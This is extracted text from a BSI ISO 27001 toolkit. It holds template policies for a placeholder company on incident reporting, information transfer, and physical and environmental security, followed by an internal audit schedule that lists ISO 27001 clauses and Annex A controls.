Document Type
Policy
Version
Owner
Authorized by
ISM02101ENGX v2.0 Nov 2017
Next Review
Page
1 of 2
©The British Standards Institution 2017
10 of 36
Toolkit (Clear desk and clear screen policy)
When working remotely all reasonable steps must be taken to protect hardware assets by
using additional physical or logical security measures, e.g. Kensington locks or PIN
numbers. Special care must be applied to mobile devices, e.g. laptops, smart phones and
USB storage devices.
Responsibilities
The Directors of ABC Organization Ltd must ensure that the principles of this policy are
implemented.
All staff must comply with this clear desk and clear screen policy at all times and whenever
their desk is left unattended.
Consequences of non-compliance
Any breaches of this policy by employees may result in disciplinary action being taken
under ABC Organization Ltd’s Disciplinary Process. Non-compliance by contracted third
parties or their employees may result in termination of the supplier’s contract.
Policy review and maintenance
This Clear Desk and Clear Screen Policy must be reviewed annually and at other times as
dictated by operational needs.
Change history
Issue1
XX Month 20XX
- First published
Subject
Clear desk and clear screen policy
Effective Date
Document Type
Policy
Version
Owner
Authorized by
ISM02101ENGX v2.0 Nov 2017
Next Review
Page
2 of 2
©The British Standards Institution 2017
11 of 36
Toolkit (Information security incident reporting and management policy)
Information security incident reporting and management policy
Objectives
To define the policy requirements to ensure information security incidents are reported and
managed effectively within ABC Organization Ltd.
The objective of the information security incident reporting and management policy is to
ensure that information security incidents are reported and managed in an appropriate
manner and that recovery is completed in a timely manner with minimal impact on the
Organization.
Scope
This policy covers the requirement to ensure that all information security events and
weaknesses are reported in a timely manner and dealt with in accordance with defined
escalation processes.
Definitions
Information asset – Any information and information processing assets of value to ABC
Organization Ltd.
Information owner – Individual accountable for the Information Asset
Incident – Any situation that could lead to a disruption to ABC Organization Ltd’s operation
Information security incident – Identified occurrence of a system, service or network
state indicating a possible breach of the [Information Security] Policy or failure of controls,
or a previously unknown situation that may be security relevant.
Information security event – Single or a series of unwanted or unexpected information
security events that have a significant probability of compromising business operations and
threatening information security.
Weakness – A vulnerability identified in controls, systems or networks that could lead to
compromise of ABC Organization Ltd’s business operations.
Information security weakness – A vulnerability identified in information security
controls, systems or networks.
Reportable incident - A reportable security incident is an event or weakness that
contravenes or could contravene the policies, processes and procedures that are part of the
information security management system (ISMS).
Subject
IS reporting and management policy
Effective Date
Document Type
Policy
Version
Owner
Authorized by
ISM02101ENGX v2.0 Nov 2017
Next Review
Page
©The British Standards Institution 2017
1 of 5
12 of 36
Toolkit (Information security incident reporting and management policy)
Policy
It is the policy of ABC Organization Ltd that:




All staff and suppliers must be aware of the requirements for reporting incidents, and
weaknesses and must adhere to the processes set out in this document
All information security incidents and weaknesses are logged in a timely manner
Appropriate action is taken to reduce the impact of an information security incident
[IT function], [HR Function] and [Facilities Function] must monitor, analyse and
report on events to determine any changes in risks affecting the confidentiality,
integrity and availability of information assets
Reporting information security events and incidents
All incidents should be reported to IS Support, who must then escalate the incident to the
appropriate team. Security related incidents must be brought to the attention of the
Information Security Team who must assess the severity and potential impact of the
incident.
An incident is defined as any event that affects or threatens the confidentiality, integrity or
availability of information. In other words, an incident is any event that implies harm or the
attempt to harm.
All information security incidents and weaknesses must be reported immediately to the
relevant [Information Security Manager] initially verbally and then followed up with the
completion of an Incident Report ([Incident Form]).
Contact details of the [Information Security Manager] must be published in the ([Portal]).
All staff must be made aware of their responsibility to report any information security events
and the process for doing so.
The [IT Function] must review and monitor all issues reported via the [Helpdesk/support
Function] and identify possible information security incidents, events and weaknesses.
These events and incidents must be reported directly to the [information Security Manager].
The [Facilities Function] must review and monitor all security and building issues reported
via their Helpdesk/Support Function and identify possible information security incidents,
events and weaknesses. These events and incidents must be reported directly to the
[Information Security Manager].
Suitable feedback processes must be followed to ensure that those reporting information
security events are notified of results after the issue has been dealt with and closed.
The [Information Security Manager] must maintain a process for recording and addressing
reported events. This process must include the ability to classify them.
Subject
IS reporting and management policy
Effective Date
Document Type
Policy
Version
Owner
Authorized by
ISM02101ENGX v2.0 Nov 2017
Next Review
Page
©The British Standards Institution 2017
2 of 5
13 of 36
Toolkit (Information security incident reporting and management policy)
Where appropriate the incident needs to be escalated to the appropriate authority. The
Information Security Team must maintain a list of all the relevant authorities and their
contact details.
Standard information security event reporting records must be created to support the
reporting action and to facilitate the collection of all relevant information.
Prior to reporting the event, staff must note all important details but not carry out any action
of their own, for whatever purpose or no matter how well intentioned.
Staff who are found to be involved with security breaches must be dealt with in accordance
with ABC Organization Ltd’s disciplinary process.
Processes used by the [Information Security Manager] must ensure that any evidence is
collected as soon as possible after the security event.
Learning from security events, incidents and weaknesses
Information security incident reporting and recording mechanisms must enable the types,
volumes and costs of information security incidents to be analysed.
The information gained from the analysis of information security incidents must be used to
identify recurring or high impact incidents.
The analysis of information security incidents must indicate the need for enhanced or
additional controls to limit the frequency, damage and cost of future occurrences, or to be
taken into account in the security policy review process.
Collection of evidence
Where a follow-up action against a person or organization after an information security
incident involves legal action (either civil or criminal), evidence should be collected, retained,
and presented to conform to the rules for evidence laid down in the relevant jurisdiction(s).
ABC Organization Ltd’s must make available appropriate facilities for collecting and
presenting evidence for the purposes of disciplinary action carried out within ABC
Organization Ltd.
ABC Organization Ltd’s [Legal Function] must provide advice on the rules for evidence that
apply in any given situation and any actions that need to be taken where the incident is
cross border into other jurisdictions.
Any forensics work must be performed on copies of the evidential material. The integrity of
all evidential material must be protected.
Evidential material must be collected under dual control by trustworthy individuals.
A record must be maintained on when and where the collection process was executed, who
performed the collection activities and which tools and programs used.
Subject
IS reporting and management policy
Effective Date
Document Type
Policy
Version
Owner
Authorized by
ISM02101ENGX v2.0 Nov 2017
Next Review
Page
©The British Standards Institution 2017
3 of 5
14 of 36
Toolkit (Information security incident reporting and management policy)
ABC Organization Ltd’s [legal function] must be involved in the early stages of any
investigation in order to assess whether legal action may ensue and, hence, evidence
required
Incident responses
Systems, alerts and vulnerabilities must be monitored as a further method of detecting
information security incidents.
ABC Organization Ltd’s priorities for handling information security incidents must be
established.
[Help desk] processes to handle different types of information security incident must include:






Information system failures and loss of service
Malicious code infiltration
Denial of service attacks
Errors
Breaches of confidentiality and integrity
Inappropriate use of information processing facilities
Additionally, the processes must assure the need for:
 Investigating and recording the cause of the incident
 Containment
 Planning and implementation of corrective action to prevent recurrence, if necessary
 Communication with those affected by or involved with recovery from the incident
 Reporting the action to an appropriate authority such as the police
 Audit trails and similar evidence to be collected and secured
Actions to recover from security breaches and correct system failures must be carefully and
formally controlled.
Responsibilities
ABC Organization Ltd’s [Information Security Manager] must be responsible for ensuring
that:
Formal event reporting and escalation processes are developed and maintained
All staff are made aware of the processes for reporting the different types of event
and weakness that might have an impact on the security of ABC Organization Ltd’s
assets
[IT Function] must be responsible for monitoring IT issues and identifying and reporting
information security incidents and weaknesses.


[Facilities Function] must be responsible for monitoring building and physical security issues
and identifying and reporting information security incidents and weaknesses.
Subject
IS reporting and management policy
Effective Date
Document Type
Policy
Version
Owner
Authorized by
ISM02101ENGX v2.0 Nov 2017
Next Review
Page
©The British Standards Institution 2017
4 of 5
15 of 36
Toolkit (Information security incident reporting and management policy)
All staff must be responsible for reporting any information security events and weaknesses
as quickly as possible to the [Information Security Manager].
Suppliers must be responsible for supporting and delivering processes, report incidents and
weaknesses in a timely manner through a formal and agreed reporting process.
Consequences of non-compliance
Any breaches of this policy by employees may result in disciplinary action being taken under
ABC Organization Ltd’s Disciplinary Process. Non-compliance by contracted third parties or
their employees may result in termination of the supplier’s contract.
Policy review and maintenance
This information security incident reporting and management policy must be reviewed
annually by the policy owner or [Information Security Forum] to ensure it remains fit for
purpose.
Change History
Issue1
XX Month 20xx
Initial draft
Subject
IS reporting and management policy
Effective Date
Document Type
Policy
Version
Owner
Authorized by
ISM02101ENGX v2.0 Nov 2017
Next Review
Page
©The British Standards Institution 2017
5 of 5
16 of 36
Toolkit (Information transfer policy)
Information transfer policy
Objectives
To define the policy requirements in relation to the maintenance of the security of
information transferred between ABC Organization Ltd and any third party.
The objectives of this information transfer policy are to ensure that:


Information is only exchanged with third parties with which there is an agreement in
place
Information transfer agreements remain appropriate and relevant
Scope
The scope of this information transfer policy applies to all information transferred with clients
and other third parties that provide goods or services to ABC Organization Ltd.
Policy
ABC Organization Ltd exchanges information with a range of external individuals and
organizations. Its policy on such exchanges is that:



Staff tasked to carry out transfers of information must be fully trained and experienced
and have full and explicit instructions as to the type and nature of the information being
transferred and how the transfer is to be effected
Prior to sharing information with external organizations a formal agreement or contract
must be in place to govern the specific requirements for security appropriate for that
information exchange
Principles must be maintained which outline the requirements for secure transmission of
information
Should any member of staff have any doubts as to how the information they are to
exchange information, they must seek advice from their line manager.
Information received from customers in hard copy must be protected at all times and either
returned to the customer when no longer required or securely destroyed.
Responsibilities
ABC Organization Ltd must ensure that this policy is complied with through regular auditing.
Staff that exchange information with clients or other third parties must be accountable for
compliance with this policy.
Consequences of non-compliance
Any breaches of this policy by employees may result in disciplinary action being taken under
ABC Organization Ltd’s Disciplinary Process. Non-compliance by contracted third parties or
their employees may result in termination of the supplier’s contract.
Subject
Information transfer policy
Effective Date
Document Type
Policy
Version
Owner
Authorized by
ISM02101ENGX v2.0 Nov 2017
Next Review
Page
©The British Standards Institution 2017
1 of 2
17 of 36
Toolkit (Information transfer policy)
Policy review and maintenance
This information transfer policy must be reviewed annually by the policy owner or
[Information Security Committee] to ensure it remains fit for purpose.
Change history
Issue1
XX Month 20xx
Initial draft.
Subject
Information transfer policy
Effective Date
Document Type
Policy
Version
Owner
Authorized by
ISM02101ENGX v2.0 Nov 2017
Next Review
Page
©The British Standards Institution 2017
2 of 2
18 of 36
Toolkit (Physical and environmental security policy)
Physical and environmental security policy
Objectives
To define the policy requirements for ensuring the prevention of unauthorized physical
access, damage and interference to ABC Organization Ltd’s information and information
processing facilities.
The objective of the Physical and Environmental Security Policy is to define the requirements
for physical security controls that must be applied at all ABC Organization Ltd sites.
Confidential ABC Organization Ltd business information processing facilities should be housed
in secure areas, protected by a defined security perimeter, with appropriate security barriers
and entry controls. They should be physically protected from unauthorized access, damage
and interference.
The protection provided should be aligned with the identified risks
Scope
This policy is first issued on [dd mmmmm yyyy] and must be fully implemented by [dd
mmmmm yyyy].
The scope of this policy is all physical ABC Organization Ltd sites holding information assets,
including:
 ABC Organization Ltd area in [List Location]
 Head Office site in [location], where data centre is located
 BCM site where backup data centre is located
All [Supplier] sites holding ABC Organization Ltd information and providing services to ABC
Organization Ltd are required to comply with this Policy.
 Management and maintenance of security processes and procedures
Policy
It is the policy of ABC Organization Ltd that secure areas must be protected by appropriate
entry controls to ensure that only authorized personnel are allowed access. The following
principles underline physical security within ABC Organization Ltd.
Subject
Owner
Document Type
Authorized by
Physical and environmental security
policy
Effective Date
Policy
Version
ISM02101ENGX v2.0 Nov 2017
Next Review
Page
©The British Standards Institution 2017
1 of 10
19 of 36
Toolkit (Physical and environmental security policy)
Physical security
Perimeter
Based on the results of risk assessments, perimeters controls must be implemented to
protect areas that contain information assets and information processing facilities.
The following controls must be considered and implemented:
 The walls of buildings or secure areas containing information processing facilities
must be physically sound to protect against unauthorized access







All doors, windows, gates and other access points to buildings must be protected with
secure locks and catches of an approved standard. These devices must be
maintained in good working order and records kept of all key holders and of those
who have access to keys
Doors and windows must be locked when unattended
Sites must be protected with prevention (e.g. barriers to restrict access by vehicles)
and detection controls (e.g. CCTV) to deter intruders, vandals, etc. and to provide a
means of retrieving relevant information should an incident occur
A manned reception area must control physical access to the building
Access to sites and buildings must be restricted to authorized employees
All fire doors on security perimeters must be alarmed, monitored, tested and operate
in a failsafe manner
Intruder detection systems must be installed to protect unoccupied areas, including
communications rooms, and regularly tested to cover all external doors and
accessible windows
External parties requiring access to secure areas, such as information processing facilities,
must be subject to the terms and conditions of a written contract expressed in legally
enforceable language.
Information processing facilities must be protected by layered physical and environmental
controls to provide ABC Organization Ltd with in depth defence and avoid single points of
failure.
The primary function of CCTV cameras must be for protection of ABC Organization Ltd
assets. The cameras must be used, where possible, to offer some protection to employees
property although this is a secondary function. Systems must be reviewed at regular
intervals to ensure they are still appropriate for the task (e.g. checking recorded footage
covers correct area and enables individuals to be identified) and modified to reflect any
changes to the building or areas covered by the cameras.
Subject
Owner
Document Type
Authorized by
Physical and environmental security
policy
Effective Date
Policy
Version
ISM02101ENGX v2.0 Nov 2017
Next Review
Page
©The British Standards Institution 2017
2 of 10
20 of 36
Toolkit (Physical and environmental security policy)
Physical entry controls
Access to all sites must be controlled by either electronic keypad or swipe/proximity card
reader which must be located at all entry and exit points of the building, excluding exits
designated for emergency use only.
Access rights to secure areas must be regularly reviewed and updated.
Access cards
All personnel authorized to access secure areas must be visibly identifiable.
Security identity badges must be issued to all members of employees, visitors, contractors,
temporary employees and any other person who needs to access to each site for any reason
without exception, other than members of the emergency services.
In buildings where a swipe/proximity card access control system is used, the employee’s
access card may double as the security identity badge.
Badges issued to employees must display the name of the employee and, where possible,
their photograph.
Employees must report the loss or suspected loss of any access card to the [Facilities
Management Function] immediately. The access card must be suspended immediately and
must be re-activated on return of the temporary pass issued.
Disciplinary measures must to be taken in any case where identification badges or access
cards are misused.
When employees leave the company, their identity badges and access cards must be
returned to [their line manager] and de-activated immediately.
Management of keypad systems
[Describe when keypads are used ...............]
When employees leave the company, their access key code must be deleted immediately
Where common access key codes are in operation, the code must be changed every two
months and when employees leave the company.
Visitor access
The date and time of entry and departure of visitors must be recorded.
Visitors of the ABC Organization Ltd sites must only be granted access to ABC Organization
Ltd facilities on invitation by ABC Organization Ltd in advance.
Reception and the security guards must be informed in advance of all planned visits.
Subject
Owner
Document Type
Authorized by
Physical and environmental security
policy
Effective Date
Policy
Version
ISM02101ENGX v2.0 Nov 2017
Next Review
Page
©The British Standards Institution 2017
3 of 10
21 of 36
Toolkit (Physical and environmental security policy)
Visitors must be:
 Accompanied from and to reception


Issued with a temporary badge which clearly identifies them as a visitor giving their
name, the company they represent and an expiry date, which must be worn by the
visitor and remain visible
Supervised at all times, unless their access has been approved [by or through the]
[temporary access authorization process] and the visitor has been issued with a
temporary access card, and given instructions ABC Organization Ltd’s security
requirements and emergency procedures
Communication rooms and data centres
Physical access to all communications rooms and data centres must be controlled and
restricted to authorized persons approved by the [Information Security Manager].
Authentication controls must be used to authorize and validate all access.
A ‘record of entry’ log book must be maintained to establish an audit trail of all accesses to
communications rooms and data centres.
Access rights to communications rooms and data centres must be:


Reviewed and updated or revoked when necessary
Updated when employees leave or change roles and responsibilities
The [Facilities Management Function] must be responsible for maintaining appropriate
environmental conditions in ABC Organization Ltd’s computer installations. Environmental
conditions, such as temperature and humidity, must be monitored in communications rooms.
Rooms housing critical IT facilities must be:


Free from intrinsic fire hazards, such as stored paper or chemicals
Fitted with serviced fire detection and suppression systems that are tested
periodically
Securing offices, rooms and facilities
A secure area may be a locked office or several rooms inside a physical security perimeter,
which may be locked and may contain lockable cabinets or safes. The selection and design
of a secure area must take into account the possibility for damage from fire, flood, explosion,
civil unrest, and other forms or natural man-made disasters.
Account must also be taken of relevant health and safety regulations and standards.
Subject
Owner
Document Type
Authorized by
Physical and environmental security
policy
Effective Date
Policy
Version
ISM02101ENGX v2.0 Nov 2017
Next Review
Page
©The British Standards Institution 2017
4 of 10
22 of 36
Toolkit (Physical and environmental security policy)
Physical security for offices, rooms and facilities must be designed and the following applied:
 Health and safety regulations must be complied with
 Key operational activities must be sited to avoid unauthorized access
 Signage must not be used to identify the location of information processing facilities



Directories and internal telephone books must be subject to ABC Organization Ltd’s
clear desk requirements which can be found in the [acceptable use] policy and
[information classification, handling and protection] policy
Consideration must be given to any security threats presented by neighbouring
premises, other surrounding activities, equipment and storage of hazardous
substances
Lockable cabinets, cupboards or drawers as appropriate must be provided for each
member of employees in order for them to keep information appropriately secured
while they carry out their duties
Working in secure areas
Employees must only be aware of the existence of, or activities within, a secure area on a
need to know basis.
Procedures must be put in place to ensure that unsupervised working in secure areas is
avoided, both for health and safety reasons and to prevent opportunities for malicious
activities.
Unsupervised working in communications rooms or data centres must be permitted with the
support of compensating controls (e.g. a maintenance engineer may be subject to formal
contract) and must be agreed in advance by the ABC Organization Ltd [Information Security
Manager].
Vacant secure areas must be locked and periodically checked.
Additional controls and guidelines may be required to enhance the security of a secured
area. This includes controls for the personnel of [supplier]s working in the secured areas, as
well as [supplier] activities taking place there.
Public access, delivery and loading areas
External access points must be controlled and, if possible, isolated from information
processing facilities to avoid unauthorized access.
Security requirements for these areas must be determined by a risk assessment. A delivery
or loading procedure must be in place to regulate these activities.
Access to the delivery and loading area must be controlled by personnel, in order that
supplies can be unloaded without delivery personnel gaining unauthorized access to other
parts of the building.
Subject
Owner
Document Type
Authorized by
Physical and environmental security
policy
Effective Date
Policy
Version
ISM02101ENGX v2.0 Nov 2017
Next Review
Page
©The British Standards Institution 2017
5 of 10
23 of 36
Toolkit (Physical and environmental security policy)
Access to the external doors of a delivery and loading area must be controlled by suitable
means when the internal doors are opened.
Incoming material deemed to be a potential threat must undergo necessary inspections
before this material is moved from the delivery and loading area to the point of use.
Incoming material must be registered in accordance with asset management processes
operated by ABC Organization Ltd.
Protecting against physical and environmental threats
Physical and environmental security controls must be designed and applied to protect against
damage from fire, flood, explosion and forms of natural or man-made disaster.
The security threats posed by neighboring premises must be considered in the design of the
physical and environmental security controls.
Standby information processing facilities and backup media must be sited at a distance
considered safe by the [Information Security Manager].
Fire detection and suppression equipment and installations must be provided based on the
findings of risk assessments.
Installation of any significant pieces of equipment or the introduction new business activities
to any secure environment must be subject to (information security) risk assessment.
Controls must be adopted to minimize the risk of potential physical threats:
 Smoking must not be allowed in any ABC Organization Ltd building
 Lightning protection must be applied to buildings and lightning protection filters must
be fitted to all incoming power and communications lines


Storage of hazardous materials must be subject to risk assessment and suitable
controls
Environmental conditions, such as temperature and humidity, must be monitored in
communications rooms
Supporting utilities
Supporting utilities, such as electricity, water supply, sewage, heating/ventilation and air
conditioning must be:
 Fit for purpose
 Regularly inspected and, as appropriate, tested to ensure their proper functioning
and to reduce the risk of malfunction or failure
ABC Organization Ltd’s electrical supplies must conform to equipment manufacturer’s
specifications.
Subject
Owner
Document Type
Authorized by
Physical and environmental security
policy
Effective Date
Policy
Version
ISM02101ENGX v2.0 Nov 2017
Next Review
Page
©The British Standards Institution 2017
6 of 10
24 of 36
Toolkit (Physical and environmental security policy)
Business critical information processing equipment must be protected from power failures
and other electrical anomalies. Options to achieve continuity of power supplies include:
 An uninterruptible power supply (UPS) to support orderly close down of information
processing facilities in communications rooms
 A backup generator with an adequate supply of fuel must be available in the event of
power loss
 Multiple feeds to avoid a single point of failure in the power supply
Emergency power off switches must be located near exits in communications rooms.
Emergency lighting must be provided in case of mains power failure.
The need for an alarm system to detect malfunctions in the water supply or the ingress of
water must be evaluated on a regular basis by the [Facilities Manager] if there is a higher
than normal likelihood of contamination by water.
Equipment security, siting and protection
Equipment must be physically sited and/or physically protected to reduce security threats
and environmental hazards. Protection of equipment (including when used off site) is
necessary to reduce the risk of unauthorized access to data and to protect against loss or
damage. This must also consider equipment disposal.
Procedures must be put in place to ensure that mobile equipment containing confidential or
sensitive information is locked in a secure cabinet or vault when not in use.
Network equipment that operates in an unattended mode (e.g. servers, switches) must be
located in a secured room or facility accessible only by authorized ABC Organization Ltd
employees or authorized external persons. Essential information about hardware/software
must be recorded in an inventory.
Inventories must:
 Be protected against unauthorized change
 Be checked periodically against actual assets
 Be kept up to date
 Be independently reviewed
 Be uniquely identified
 Specify hardware or software versions
 Specify the location of hardware or software
Managers are responsible for ensuring that inventories are properly maintained.
Subject
Owner
Document Type
Authorized by
Physical and environmental security
policy
Effective Date
Policy
Version
ISM02101ENGX v2.0 Nov 2017
Next Review
Page
©The British Standards Institution 2017
7 of 10
25 of 36
Toolkit (Physical and environmental security policy)
Cabling security
Special controls may be required to protect against hazards or unauthorized access and to
safeguard supporting facilities, such as the electrical supply and cabling infrastructure.
Power and telecommunications cabling carrying data or supporting information services must
be protected from interception or damage.
Procedures must be in place to guarantee that power cables are segregated from
communication cables to prevent interference.
Power and telecommunications lines into information processing facilities must be
underground, where possible.
Network cabling must be protected from unauthorized interception or damage.
Cables must be colour coded and a documented patch list must be used to reduce the
possibility of errors.
Equipment maintenance
Equipment must be correctly maintained to ensure its continued availability and integrity.
Equipment must be maintained in accordance with the supplier’s recommended
specifications and service intervals.
Only contracted, authorized maintenance engineers must carry out repairs and service
equipment.
Records must be kept of all suspected or actual faults and all preventive and corrective
maintenance.
Appropriate controls must be implemented when equipment containing confidential materials
and information is maintained.
All requirements imposed by insurance policies taken out by ABC Organization Ltd must be
complied with.
Security of equipment off-premises
The security of equipment off premises must be equivalent to that for on-site equipment
used for the same purpose, taking into account the risks of working outside the
organization’s premises.
Security risks vary considerably between locations and must be taken into account in
determining the most appropriate controls.
Equipment and media taken off ABC Organization Ltd’s sites must not be left unattended in
public places; mobile devices must be carried as hand luggage and disguised where possible
when travelling.
Subject
Owner
Document Type
Authorized by
Physical and environmental security
policy
Effective Date
Policy
Version
ISM02101ENGX v2.0 Nov 2017
Next Review
Page
©The British Standards Institution 2017
8 of 10
26 of 36
Toolkit (Physical and environmental security policy)
Manufacturers’ instructions for protecting equipment must be observed at all times.
Adequate insurance cover must be in place to protect equipment off site.
Controls applied to equipment and media taken off ABC Organization Ltd’s sites must take
account of local circumstances.
Specific provisions for the security of equipment off-premises are made within the ABC
Organization Ltd [mobile device and teleworking] policy.
Secure disposal or re-use of equipment
The [IT function] within ABC Organization Ltd must check all items of equipment containing
storage media to ensure that any sensitive data and licensed software has been removed or
securely overwritten prior to disposal.
A disposal acknowledgement report from any chosen disposal services must be held
confirming the disposal of named assets and appropriate destruction of data and storage
devices.
Devices containing classified information must be physically destroyed or the information
must be destroyed, deleted or overwritten using techniques to make the original information
non-retrievable.
Damaged devices containing classified information must be dealt with in accordance with
ABC Organization Ltd’s [information classification, handling and protection] policy.
Removal of property
Information assets must not be taken off site without prior authorization from the
information owner.
[Highly confidential] information must not be taken off site other than as part of the transfer
process described in the [information classification, handling and protection] policy.
The location of information assets taken off site must be recorded as being removed off-site
in the asset register.
Photography
Photography or filming of any type is not permitted on any ABC Organization Ltd premises
without the prior permission of the [Information Security Manager].
Responsibilities
All employees must comply with this [physical and environmental security] policy. Any
breach of this policy must be treated as an incident and may be dealt with in accordance
with ABC Organization Ltd’s disciplinary procedure as defined in the [Employee Handbook].
Subject
Owner
Document Type
Authorized by
Physical and environmental security
policy
Effective Date
Policy
Version
ISM02101ENGX v2.0 Nov 2017
Next Review
Page
©The British Standards Institution 2017
9 of 10
27 of 36
Toolkit (Physical and environmental security policy)
The ABC Organization Ltd [Information Security Manager] is responsible for
managing the information security policy, and for the identification, evaluation and treatment
of risks. The [Information Security Manager] must ensure that this Policy is communicated to
all employees and that they understand their responsibilities. The ABC Organization Ltd
[Information Security Manager] must ensure that all employees are provided with training in
support of this policy.
The [Facilities Management Function] is responsible for:



Assisting the [Information Security Manager] in the identification and evaluation of
risks relating to new and existing ABC Organization Ltd sites and sites holding ABC
Organization Ltd’s information assets
Physical security of premises including the provision of appropriate resources and
physical security measures
Management and maintenance of security processes and procedures
Consequences of non-compliance
Any breaches of this policy by employees may result in disciplinary action being taken under
ABC Organization Ltd’s Disciplinary Process. Non-compliance by contracted third parties or
their employees may result in termination of the supplier’s contract.
Policy review and maintenance
This [physical and environmental security] policy must be reviewed annually by the Policy
Owner or [Information Security Management Committee] to ensure it remains fit for
purpose.
Change history
Issue1
Subject
Owner
Document Type
Authorized by
XX Month 20xx
Initial draft
Physical and environmental security
policy
Effective Date
Policy
Version
ISM02101ENGX v2.0 Nov 2017
Next Review
Page
©The British Standards Institution 2017
10 of 10
28 of 36
Toolkit
Information security internal audit schedule
Audit schedule
Clause 4 Context of the Organization
4.1 Understanding the organization and its context
4.2 Understanding the needs and expectations of
interested parties
4.3 Understanding the scope of the information
security management system
4.4 Information security management system
Clause 5 Leadership
5.1 Leadership and commitment
5.2 Policy
5.3 Organizational roles, responsibilities and
authorities
Clause 6 Planning
6.1 Actions to address risks and opportunities
6.2 Information security objectives and planning to
achieve them
Clause 7 Support
7.1 Resources
7.2 Competence
7.3 Awareness
7.4 Communication
7.5 Documented information
Clause 8 Operation
8.1 Operational planning and control
ISM02101ENGX v2.0 Nov 2017
Year 1
Jul-20xx
Jan-20xx
©The British Standards Institution 2017
Year 2
Jul-20xx
Jan-20xx
Year 3
Jul-20xx
Jan-20xx
29 of 36
Audit schedule
8.2 Information security risk assessment
8.3 Information security risk treatment
Clause 9 Performance evaluation
9.1 Monitoring, measurement, analysis and
evaluation
9.2 Internal audit
9.3 Management review
Clause 10 Improvement
10.1 Nonconformity and corrective action
10.2 Continual improvement
A.5.1 Management direction for information
security
A.5.1.1 Policies for information security
A.5.1.2 Review of the policies for information
security
A.6.1 Internal organization
A.6.1.1 Information security roles and responsibilities
A.6.1.2 Segregation of duties
A.6.1.3 Contact with authorities
A.6.1.4 Contact with special interest groups
A.6.1.5 Information security in project management
A.6.2 Mobile devices and teleworking
A.6.2.1 Mobile device policy
A.6.2.2 Teleworking
A.7.1 Prior to employment
A.7.1.1 Screening
A.7.1.2 Terms and conditions of employment
ISM02101ENGX v2.0 Nov 2017
Year 1
Jul-20xx
Jan-20xx
©The British Standards Institution 2017
Year 2
Jul-20xx
Jan-20xx
Year 3
Jul-20xx
Toolkit
Jan-20xx
30 of 36
Audit schedule
A.7.2 During employment
A.7.2.1 Management responsibilities
A.7.2.2 Information security awareness, education
and training
A.7.2.3 Disciplinary process
A.7.3 Termination and change of employment
A.7.3.1 Termination or change of employment
responsibilities
A.8.1 Responsibility for assets
A.8.1.1 Inventory of assets
A.8.1.2 Ownership of assets
A.8.1.3 Acceptable use of assets
A.8.1.4 Return of assets
A.8.2 Information classification
A.8.2.1 Classification of information
A.8.2.2 Labelling of information
A.8.2.3 Handling of assets
A.8.3 Media handling
A.8.3.1 Management of removable media
A.8.3.2 Disposal of media
A.8.3.3 Physical media transfer
A.9.1 Business requirements of access control
A.9.1.1 Access control policy
A.9.1.2 Access to networks and network services
A.9.2 User access management
A.9.2.1 User registration and de-registration
A9.2.2 User access provisioning
ISM02101ENGX v2.0 Nov 2017
Year 1
Jul-20xx
Jan-20xx
©The British Standards Institution 2017
Year 2
Jul-20xx
Jan-20xx
Year 3
Jul-20xx
Toolkit
Jan-20xx
31 of 36
Audit schedule
A.9.2.3 Management of privileged access rights
A.9.2.4 Management of secret authentication
information of users
A.9.2.5 Review of user access rights
A.9.2.6 Removal or adjustment of access rights
A.9.3 User responsibilities
A.9.3.1 Use of secret authentication information
A.9.4 System and application access control
A.9.4.1 Information access restriction
A.9.4.2 Secure log-on procedures
A.9.4.3 Password management system
A.9.4.4 Use of privileged utility programs
A.9.4.5 Access control to program source code
A.10.1 Cryptographic controls
A.10.1.1 Policy on the use of cryptographic controls
A.10.1.2 Key management
A.11.1 Secure areas
A.11.1.1 Physical security perimeter
A.11.1.2 Physical entry controls
A.11.1.3 Securing offices, rooms and facilities
A.11.1.4 Protecting against external end
environmental threats
A.11.1.5 Working in secure areas
A.11.1.6 Delivery and loading areas
A.11.2 Equipment
A.11.2.1 Equipment siting and protection
A.11.2.2 Supporting utilities
ISM02101ENGX v2.0 Nov 2017
Year 1
Jul-20xx
Jan-20xx
©The British Standards Institution 2017
Year 2
Jul-20xx
Jan-20xx
Year 3
Jul-20xx
Toolkit
Jan-20xx
32 of 36
Audit schedule
A.11.2.3 Cabling security
A.11.2.4 Equipment maintenance
A.11.2.5 Removal of assets
A.11.2.6 Security of equipment and assets offpremises
A.11.2.7 Secure disposal or re-use of equipment
A.11.2.8 Unattended user equipment
A.11.2.9 Clear desk and clear screen policy
A.12.1 Operational procedures and
responsibilities
A.12.1.1 Documented operating procedures
A.12.1.2 Change management
A.12.1.3 Capacity management
A.12.1.4 Separation of development, testing and
operational environments
A.12.2 Protection from malware
A.12.2.1 Controls against malware
A.12.3 Backup
A.12.3.1 Information backup
A.12.4 Logging and monitoring
A.12.4.1 Event logging
A.12.4.2 Protection of log information
A.12.4.3 Administrator and operator logs
A.12.4.4 Clock Synchronisation
A.12.5 Control of operational software
A.12.5.1 Installation of software on operational
systems
ISM02101ENGX v2.0 Nov 2017
Year 1
Jul-20xx
Jan-20xx
©The British Standards Institution 2017
Year 2
Jul-20xx
Jan-20xx
Year 3
Jul-20xx
Toolkit
Jan-20xx
33 of 36
Audit schedule
A.12.6 Technical vulnerability management
A.12.6.1 Management of technical vulnerabilities
A.12.6.2 Restrictions on software installation
A.12.7 Information systems audit
considerations
A.12.7.1 Information systems audit controls
A.13.1 Network security management
A.13.1.1 Network controls
A.13.1.2 Security of network services
A.13.1.3 Segregation in networks
A.13.2 Information transfer
A.13.2.1 Information transfer policies and
procedures
A.13.2.2 Agreements on information transfer
A.13.2.3 Electronic messaging
A.13.2.4 Confidentiality or non-disclosure
agreements
A.14.1 Security requirements of information
systems
A.14.1.1 Information security requirements analysis
and specification
A.14.1.2 Securing applications services on public
networks
A.14.1.3 Protecting application services transactions
A.14.2 Security in development and support
processes
A.14.2.1 Secure development policy
A.14.2.2 System change control procedures
ISM02101ENGX v2.0 Nov 2017
Year 1
Jul-20xx
Jan-20xx
©The British Standards Institution 2017
Year 2
Jul-20xx
Jan-20xx
Year 3
Jul-20xx
Toolkit
Jan-20xx
34 of 36
Audit schedule
A.14.2.3 Technical review of applications after
operating platform changes
A.14.2.4 Restrictions on changes to software
packages
A.14.2.5 Secure system engineering principles
A.14.2.6 Secure development environment
A.14.2.7 Outsourced development
A.14.2.8 System security testing
A.14.2.9 System acceptance testing
A.14.3 Test data
A.14.3.1 Protection of test data
A.15.1 Information security in supplier
relationship
A.15.1.1 Information security policy for supplier
relationships
A.15.1.2 Addressing security within supplier
agreements
A.15.1.3 Information and communication technology
supply chain
A.15.2 Supplier service delivery management
A.15.2.1 Monitoring and review of supplier services
